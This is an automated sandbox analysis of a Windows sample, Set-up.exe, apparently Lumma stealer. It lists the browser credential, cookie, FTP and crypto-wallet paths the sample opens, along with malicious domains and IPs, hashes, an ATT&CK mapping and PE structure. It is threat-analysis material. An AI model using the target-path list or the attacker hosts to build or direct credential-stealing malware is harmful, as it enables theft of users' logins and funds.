          Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
          Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
          Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
          Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
          Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
          Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
          Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
          Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
          Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
          Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
          Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
          Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
          Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
          Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
          Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
          Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
          Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
          Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Binance
          Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
          Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
          Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
          Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
          Source: C:\Users\user\Desktop\Set-up.exe Directory queried: C:\Users\user\Documents
          Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
          Source: Yara matchFile source: Process Memory Space: Set-up.exe PID: 6544, type: MEMORYSTR

          Remote Access Functionality

          Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
          Source: Yara match File source: Process Memory Space: Set-up.exe PID: 6544, type: MEMORYSTR
          Source: Yara match File source: sslproxydump.pcap, type: PCAP
          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
          Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Process Injection | 11 Virtualization/Sandbox Evasion | 2 OS Credential Dumping | 1 System Time Discovery | Remote Services | 21 Input Capture | 21 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
          Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | 21 Input Capture | 1 Query Registry | Remote Desktop Protocol | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
          Email Addresses | DNS Server | Domain Accounts | 1 Native API | Logon Script (Windows) | Logon Script (Windows) | 11 Deobfuscate/Decode Files or Information | Security Account Manager | 141 Security Software Discovery | SMB/Windows Admin Shares | 41 Data from Local System | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
          Employee Names | Virtual Private Server | Local Accounts | 1 PowerShell | Login Hook | Login Hook | 3 Obfuscated Files or Information | NTDS | 11 Virtualization/Sandbox Evasion | Distributed Component Object Model | 2 Clipboard Data | 114 Application Layer Protocol | Traffic Duplication | Data Destruction
          Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 2 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
          DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 23 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery

          Source | Detection | Scanner | Label | Link
          Set-up.exe | 32% | ReversingLabs | Win32.Spyware.Lummastealer |
          No Antivirus matches
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          worddosofrm.shop | 104.21.16.142 | true | true | | unknown
          corehairydu.icu | unknown | unknown | true | | unknown
          18.31.95.13.in-addr.arpa | unknown | unknown | false | | high
          50.23.12.20.in-addr.arpa | unknown | unknown | true | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
147.45.47.81 | unknown | Russian Federation | 2895 | FREE-NET-ASFREEnetEU | false
104.21.16.142 | worddosofrm.shop | United States | 13335 | CLOUDFLARENETUS | true
                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                          Analysis ID:1551389
                                                                                                                          Start date and time:2024-11-07 17:38:12 +01:00
                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                          Overall analysis duration:0h 4m 31s
                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                          Report type:full
                                                                                                                          Cookbook file name:default.jbs
                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                          Number of analysed new started processes analysed:4
                                                                                                                          Number of new started drivers analysed:0
                                                                                                                          Number of existing processes analysed:0
                                                                                                                          Number of existing drivers analysed:0
                                                                                                                          Number of injected processes analysed:0
                                                                                                                          Technologies:
                                                                                                                          • HCA enabled
                                                                                                                          • EGA enabled
                                                                                                                          • AMSI enabled
                                                                                                                          Analysis Mode:default
                                                                                                                          Analysis stop reason:Timeout
                                                                                                                          Sample name:Set-up.exe
                                                                                                                          Detection:MAL
                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@1/0@4/2
                                                                                                                          EGA Information:
                                                                                                                          • Successful, ratio: 100%
                                                                                                                          HCA Information:
                                                                                                                          • Successful, ratio: 71%
                                                                                                                          • Number of executed functions: 25
                                                                                                                          • Number of non-executed functions: 281
                                                                                                                          Cookbook Comments:
                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                          • Stop behavior analysis, all processes terminated
                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                          • VT rate limit hit for: Set-up.exe
Time | Type | Description
11:39:18 | API Interceptor | 11x Sleep call for process: Set-up.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
147.45.47.81 | Set-up.exe | malicious | LummaC Stealer | 147.45.47.81/conhost.exe
147.45.47.81 | inject.exe | malicious | RedLine, Xmrig | 147.45.47.81/conhost.exe
147.45.47.81 | BlazeHack.exe | malicious | PureLog Stealer, RedLine, Xmrig | 147.45.47.81/WinRing0x64.sys
147.45.47.81 | CKHSihDX4S.exe | malicious | RedLine, Xmrig | 147.45.47.81/WinRing0x64.sys
147.45.47.81 | XXZahG4d9Z.exe | malicious | RedLine, Xmrig | 147.45.47.81/WinRing0x64.sys
147.45.47.81 | n6o0pd9pZC.exe | malicious | Xmrig | 147.45.47.81/WinRing0x64.sys
147.45.47.81 | lfjG1UlwP1.exe | malicious | LummaC, Xmrig | 147.45.47.81/xmrig.exe
147.45.47.81 | SecuriteInfo.com.Trojan.InjectNET.17.32646.13700.exe | malicious | LummaC, Xmrig | 147.45.47.81/xmrig.exe
147.45.47.81 | installer.exe | malicious | LummaC, PureLog Stealer, Xmrig, zgRAT | 147.45.47.81/WinRing0x64.sys
147.45.47.81 | conhost.exe | malicious | Xmrig | 147.45.47.81/xmrig.exe
104.21.16.142 | SecuriteInfo.com.W32.MSIL_Kryptik.KHA.gen.Eldorado.19300.19769.exe | malicious | LummaC |
104.21.16.142 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar |
104.21.16.142 | file.exe | malicious | LummaC |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
worddosofrm.shop | SecuriteInfo.com.W32.MSIL_Kryptik.KHA.gen.Eldorado.19300.19769.exe | malicious | LummaC | 104.21.16.142
worddosofrm.shop | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 104.21.16.142
worddosofrm.shop | file.exe | malicious | LummaC | 104.21.16.142
Match | Associated Sample Name / URL | Detection | Threat Name | Context
FREE-NET-ASFREEnetEU | 7IXl1M9JGV.exe | malicious | Unknown | 147.45.44.131
FREE-NET-ASFREEnetEU | mpsl.elf | malicious | Unknown | 193.233.193.45
FREE-NET-ASFREEnetEU | arm7-20241104-0018.elf | malicious | Unknown | 193.233.193.45
FREE-NET-ASFREEnetEU | na.elf | malicious | Unknown | 193.233.193.45
FREE-NET-ASFREEnetEU | SecuriteInfo.com.Win32.Malware-gen.1695.31617.exe | malicious | CredGrabber, Meduza Stealer | 193.233.254.0
FREE-NET-ASFREEnetEU | 8mxzNuOrmA.exe | malicious | PrivateLoader | 147.45.47.169
FREE-NET-ASFREEnetEU | 8mmCiIv2Y1.exe | malicious | DCRat, PureLog Stealer, zgRAT | 147.45.45.201
FREE-NET-ASFREEnetEU | 8mxzNuOrmA.exe | malicious | PrivateLoader | 147.45.47.169
FREE-NET-ASFREEnetEU | harm4.elf | malicious | Unknown | 193.233.193.45
FREE-NET-ASFREEnetEU | harm5.elf | malicious | Mirai | 193.233.193.45
CLOUDFLARENETUS | 2Qx5a1PR8h.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 172.67.133.135
CLOUDFLARENETUS | RvWTDQm7yl.exe | malicious | LummaC | 188.114.97.3
CLOUDFLARENETUS | vMRlWtVCEN.exe | malicious | Stealc, Vidar | 172.64.41.3
CLOUDFLARENETUS | c54f4c04-95c8-e3ea-7c13-45cbc3ee9b45.eml | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer, Stealc | 104.21.5.155
CLOUDFLARENETUS | https://truckstop.one/as/authorize?client_id=7a99fb37-0cbd-4526-a557-bd283b9e9cf4&redirect_uri=https%253a%252f%252fapp.truckstop.com%252flanding%252fpingexternallogincallback&response_type=code%2520id_token%2520token&state=openidconnect.authenticationproperties%253dd1azkrievou5xvfp-qj6lz4lvhnji_zurlus4dg4kpfyaz8_l_zh9eagafd4qs-4bp_xmv_gxhfi9cicmwuipdyvxvvyerzotaovt3vtqf9ajzj3wmqtyitt_jeovipdmigoy5j_5dpehnbhcu93ulmdxyuni7lptn61kjfj7vt78qwvlvinfcjk1ngsl46tbysxh2azfm_i1dlik1uodaqthlvy6gtmnpueowutlftvhwsb7ejrpju0ggwa6pbfqx5adq&response_mode=form_post&nonce=638448261415283047.mdq2yjfinjytmwrjyi00ote4lwi3yjitodyzytm5ymu3mdbmotkxmzeyzdmtmzm5nc00yzq2lthlnjktmdvindc5njg3owjk&x-client-sku=id_net461&x-client-ver=7.0.1.0 | malicious | Unknown | 188.114.97.3
CLOUDFLARENETUS | ZF3dxapdNLa4lNL.doc | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
CLOUDFLARENETUS | d01SFZW0Tt.exe | malicious | Unknown | 172.64.41.3
CLOUDFLARENETUS | http://eon.keit.re.kr/WEOMTRACK.html?CPKN=O&CPSQ=88327186&CPSC=0&CPID=16122900000005&CPMEM=MTAwMDkwODg%3D&CLID=006&CLKN=CL&CPCED=20171231&DRTMF=5&DRTMT=60&URL=https://form.jotform.com/243104959551055 | malicious | Unknown | 104.22.72.81
CLOUDFLARENETUS | http://ebook-hunter.org | malicious | Unknown | 188.114.96.3
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | 2Qx5a1PR8h.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 104.21.16.142
a0e9f5d64349fb13191bc781f81f42e1 | RvWTDQm7yl.exe | malicious | LummaC | 104.21.16.142
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC Stealer, Stealc | 104.21.16.142
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 104.21.16.142
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC, Stealc, Vidar | 104.21.16.142
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 104.21.16.142
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 104.21.16.142
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC | 104.21.16.142
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC, Stealc | 104.21.16.142
                                                                                                                                No context
                                                                                                                                No created / dropped files found
                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                Entropy (8bit):6.678749159746044
                                                                                                                                TrID:
                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.55%
                                                                                                                                • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                File name:Set-up.exe
                                                                                                                                File size:14'085'344 bytes
                                                                                                                                MD5:206d3ede48db6abcd0887aab3442a590
                                                                                                                                SHA1:8fcb9af4c1c4bb3af65aa5da2e12d9256b038e9e
                                                                                                                                SHA256:835a32a57441be4b9f8861e80dd7a70c724c5024743d84fea0db6de46635e449
                                                                                                                                SHA512:d7ababbac901e1e7ec0bb5642470ac2f2cea1c193213a40ebc5c902deac5192a8b5aa9aa49ee31649f7b259422ae82c057eb04df0b32630d6a20b3e9e4705a71
                                                                                                                                SSDEEP:393216:6EzwWZp/a9Z540UVD0wtIFC79QEuxXdqs2MF:6EzwWje5cIFC77+
                                                                                                                                TLSH:DFE69D21B7A18236F5F32271793DAB6E08397D724B3494CB92881C9C9DB47D24E35B27
                                                                                                                                File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........}....a...a...a.,.....a.,.....a.,.....a..Bb...a..Bd...a..Be...a.}Ed...a..Bd...a..d....a..d....a...`...a..Bh...a..B....a..Bc...a
                                                                                                                                Icon Hash:2f232d67b7934633
                                                                                                                                Entrypoint:0x6e9950
                                                                                                                                Entrypoint Section:.text
                                                                                                                                Digitally signed:true
                                                                                                                                Imagebase:0x400000
                                                                                                                                Subsystem:windows gui
                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                Time Stamp:0x66ABDEBF [Thu Aug 1 19:15:11 2024 UTC]
                                                                                                                                TLS Callbacks:0x725ff0, 0x726070
                                                                                                                                CLR (.Net) Version:
                                                                                                                                OS Version Major:5
                                                                                                                                OS Version Minor:1
                                                                                                                                File Version Major:5
                                                                                                                                File Version Minor:1
                                                                                                                                Subsystem Version Major:5
                                                                                                                                Subsystem Version Minor:1
                                                                                                                                Import Hash:e19cb5740593b8b2ec235286157edb32
                                                                                                                                Signature Valid:false
                                                                                                                                Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
                                                                                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                Error Number:-2146869232
                                                                                                                                Not Before, Not After
                                                                                                                                • 11/11/2022 00:00:00 10/11/2025 23:59:59
                                                                                                                                Subject Chain
• CN=Millionth Line AB, O=Millionth Line AB, S=Stockholms län, C=SE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=SE, SERIALNUMBER=556906-5153
                                                                                                                                Version:3
                                                                                                                                Thumbprint MD5:0BF93D6F0762560861F26CDEB305CA2D
                                                                                                                                Thumbprint SHA-1:580CEF4C4C73245CD6A745BF09B3826BBDA8B6B4
                                                                                                                                Thumbprint SHA-256:9345A202D04D33530A672E0F389C03BB2144E42B36C8242AE2CC3C6885C072C0
                                                                                                                                Serial:009B9C9D8D51AB000F7244213C89810756
                                                                                                                                Instruction
                                                                                                                                call 00007F006CBFA1F9h
                                                                                                                                jmp 00007F006CBF968Dh
                                                                                                                                push ebp
                                                                                                                                mov ebp, esp
                                                                                                                                push 00000000h
                                                                                                                                call dword ptr [00782128h]
                                                                                                                                push dword ptr [ebp+08h]
                                                                                                                                call dword ptr [00782344h]
                                                                                                                                push C0000409h
                                                                                                                                call dword ptr [00782340h]
                                                                                                                                push eax
                                                                                                                                call dword ptr [0078211Ch]
                                                                                                                                pop ebp
                                                                                                                                ret
                                                                                                                                push ebp
                                                                                                                                mov ebp, esp
                                                                                                                                sub esp, 00000324h
                                                                                                                                push 00000017h
                                                                                                                                call 00007F006CC167A9h
                                                                                                                                test eax, eax
                                                                                                                                je 00007F006CBF9817h
                                                                                                                                push 00000002h
                                                                                                                                pop ecx
                                                                                                                                int 29h
                                                                                                                                mov dword ptr [008E9B98h], eax
                                                                                                                                mov dword ptr [008E9B94h], ecx
                                                                                                                                mov dword ptr [008E9B90h], edx
                                                                                                                                mov dword ptr [008E9B8Ch], ebx
                                                                                                                                mov dword ptr [008E9B88h], esi
                                                                                                                                mov dword ptr [008E9B84h], edi
                                                                                                                                mov word ptr [008E9BB0h], ss
                                                                                                                                mov word ptr [008E9BA4h], cs
                                                                                                                                mov word ptr [008E9B80h], ds
                                                                                                                                mov word ptr [008E9B7Ch], es
                                                                                                                                mov word ptr [008E9B78h], fs
                                                                                                                                mov word ptr [008E9B74h], gs
                                                                                                                                pushfd
                                                                                                                                pop dword ptr [008E9BA8h]
                                                                                                                                mov eax, dword ptr [ebp+00h]
                                                                                                                                mov dword ptr [008E9B9Ch], eax
                                                                                                                                mov eax, dword ptr [ebp+04h]
                                                                                                                                mov dword ptr [008E9BA0h], eax
                                                                                                                                lea eax, dword ptr [ebp+08h]
                                                                                                                                mov dword ptr [008E9BACh], eax
                                                                                                                                mov eax, dword ptr [ebp-00000324h]
                                                                                                                                mov dword ptr [008E9AE8h], 00010001h
                                                                                                                                Programming Language:
                                                                                                                                • [C++] VS2015 UPD3.1 build 24215
                                                                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                                                                • [RES] VS2015 UPD3 build 24213
                                                                                                                                • [LNK] VS2015 UPD3.1 build 24215
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x4d500c | 0x12c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4f0000 | 0x5cfffa | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xd6be00 | 0x2ee0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xac0000 | 0x3a32e | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x46b560 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x46b62c | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x46b5d0 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x382000 | 0x484 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x3802aa | 0x380400 | 3f7c774058cc5290de3cd5f69083e543 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x382000 | 0x1549a6 | 0x154a00 | 8b0aba875816d0b88f4d01f9d3213742 | False | 0.2018814506880734 | data | 4.73043041051132 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x4d7000 | 0x17010 | 0x12600 | f416f689fa33eeff53a7e4c6f8b71d84 | False | 0.19369153911564627 | OpenPGP Secret Key | 5.245242800830523 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x4ef000 | 0x99 | 0x200 | 8e3343efa9afc26ac6caf49228cbe049 | False | 0.033203125 | data | 0.020393135236084953 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x4f0000 | 0x5cfffa | 0x5d0000 | 17c8ee7a6b09307916d57eefaf3b182d | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xac0000 | 0x8d400 | 0x8d400 | 80818290e5c38b66ddec6925ccbbeb1e | False | 0.6037368639380531 | data | 7.489395194159537 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
B7 | 0x4f40bc | 0x540c34 | 7-zip archive data, version 0.4 | English | United States | 0.5005550384521484
RT_BITMAP | 0xa34cf0 | 0xa8e8 | Device independent bitmap graphic, 120 x 120 x 24, image size 0, resolution 3780 x 3780 px/m | English | United States | 0.4533765032377428
RT_ICON | 0xa3f5d8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192, 16 important colors | English | United States | 0.6317567567567568
RT_ICON | 0xa3f700 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320, 256 important colors | English | United States | 0.5823699421965318
RT_ICON | 0xa3fc68 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640, 16 important colors | English | United States | 0.5120967741935484
RT_ICON | 0xa3ff50 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.5455776173285198
RT_ICON | 0xa407f8 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1536 | English | United States | 0.36341463414634145
RT_ICON | 0xa40e60 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2688 | English | United States | 0.42350746268656714
RT_DIALOG | 0xa41d08 | 0x5a | data | English | United States | 0.7555555555555555
RT_STRING | 0xa41d64 | 0xd0a | data | English | United States | 0.4682444577591372
RT_STRING | 0xa42a70 | 0xdd2 | data | English | United States | 0.38157150932730355
RT_STRING | 0xa43844 | 0xc0c | data | English | United States | 0.5239948119325551
RT_STRING | 0xa44450 | 0xd3c | Targa image data - Color 1072 x 1093 x 32 +1083 +1075 "\257\0045\0044\004 " | English | United States | 0.4542502951593861
RT_STRING | 0xa4518c | 0xbac | data | English | United States | 0.499665327978581
RT_STRING | 0xa45d38 | 0x396 | data | English | United States | 0.6285403050108932
RT_STRING | 0xa460d0 | 0x2dc | data | English | United States | 0.4959016393442623
RT_STRING | 0xa463ac | 0x282 | data | English | United States | 0.7819314641744548
RT_STRING | 0xa46630 | 0x2be | data | English | United States | 0.603988603988604
RT_STRING | 0xa468f0 | 0x2ce | data | English | United States | 0.6782729805013927
RT_STRING | 0xa46bc0 | 0x1c6 | data | English | United States | 0.7026431718061674
RT_STRING | 0xa46d88 | 0x1d6 | data | English | United States | 0.5808510638297872
RT_STRING | 0xa46f60 | 0x1f0 | data | English | United States | 0.7701612903225806
RT_STRING | 0xa47150 | 0x1d8 | data | English | United States | 0.6334745762711864
RT_STRING | 0xa47328 | 0x1ca | data | English | United States | 0.7183406113537117
RT_STRING | 0xa474f4 | 0x21a | data | English | United States | 0.6672862453531598
RT_STRING | 0xa47710 | 0x28e | data | English | United States | 0.43577981651376146
RT_STRING | 0xa479a0 | 0x27c | data | English | United States | 0.7468553459119497
RT_STRING | 0xa47c1c | 0x2ae | data | English | United States | 0.6749271137026239
RT_STRING | 0xa47ecc | 0x280 | data | English | United States | 0.6296875
RT_STRING | 0xa4814c | 0x152 | data | English | United States | 0.7958579881656804
RT_STRING | 0xa482a0 | 0xcc | data | English | United States | 0.7401960784313726
RT_STRING | 0xa4836c | 0xd2 | data | English | United States | 0.8904761904761904
RT_STRING | 0xa48440 | 0xea | data | English | United States | 0.8974358974358975
RT_STRING | 0xa4852c | 0xe8 | data | English | United States | 0.7931034482758621
RT_STRING | 0xa48614 | 0x124 | data | English | United States | 0.8561643835616438
RT_STRING | 0xa48738 | 0x20c | Targa image data - RLE 1083 x 1103 x 32 +1077 +1075 "A\0045\004." | English | United States | 0.601145038167939
RT_STRING | 0xa48944 | 0x21c | data | English | United States | 0.6611111111111111
RT_STRING | 0xa48b60 | 0x24c | data | English | United States | 0.7261904761904762
RT_STRING | 0xa48dac | 0x1d2 | data | English | United States | 0.6609442060085837
RT_STRING | 0xa48f80 | 0x200 | data | English | United States | 0.75
RT_STRING | 0xa49180 | 0x2ce | data | English | United States | 0.564066852367688
RT_STRING | 0xa49450 | 0x298 | data | English | United States | 0.6204819277108434
RT_STRING | 0xa496e8 | 0x278 | data | English | United States | 0.7848101265822784
RT_STRING | 0xa49960 | 0x2d2 | Targa image data - Color 2379 x 2337 x 32 +2344 +2354 "8\011.\011M\011*\011(\011M\011(\011 " | English | United States | 0.6481994459833795
RT_STRING | 0xa49c34 | 0x29a | data | English | United States | 0.7087087087087087
RT_STRING | 0xa49ed0 | 0x488 | data | English | United States | 0.5198275862068965
RT_STRING | 0xa4a358 | 0x476 | data | English | United States | 0.4956217162872154
RT_STRING | 0xa4a7d0 | 0x49c | data | English | United States | 0.6466101694915254
RT_STRING | 0xa4ac6c | 0x456 | data | English | United States | 0.5540540540540541
RT_STRING | 0xa4b0c4 | 0x3f8 | data | English | United States | 0.5974409448818898
RT_STRING | 0xa4b4bc | 0x460 | data | English | United States | 0.575
RT_STRING | 0xa4b91c | 0x4b4 | data | English | United States | 0.46677740863787376
RT_STRING | 0xa4bdd0 | 0x478 | data | English | United States | 0.6354895104895105
RT_STRING | 0xa4c248 | 0x470 | data | English | United States | 0.5598591549295775
RT_STRING | 0xa4c6b8 | 0x41c | data | English | United States | 0.5807984790874525
RT_STRING | 0xa4cad4 | 0x426 | data | English | United States | 0.5790960451977402
RT_STRING | 0xa4cefc | 0x488 | data | English | United States | 0.45775862068965517
RT_STRING | 0xa4d384 | 0x424 | data | English | United States | 0.6490566037735849
RT_STRING | 0xa4d7a8 | 0x42c | data | English | United States | 0.5608614232209738
RT_STRING | 0xa4dbd4 | 0x43a | data | English | United States | 0.6090573012939002
RT_STRING | 0xa4e010 | 0x43c | data | English | United States | 0.6199261992619927
RT_STRING | 0xa4e44c | 0x59c | data | English | United States | 0.435933147632312
RT_STRING | 0xa4e9e8 | 0x500 | Targa image data - Color 2379 x 2337 x 32 +2344 +2354 "\025\011@\011 " | English | United States | 0.6640625
RT_STRING | 0xa4eee8 | 0x59c | data | English | United States | 0.5682451253481894
RT_STRING | 0xa4f484 | 0x536 | data | English | United States | 0.5907046476761619
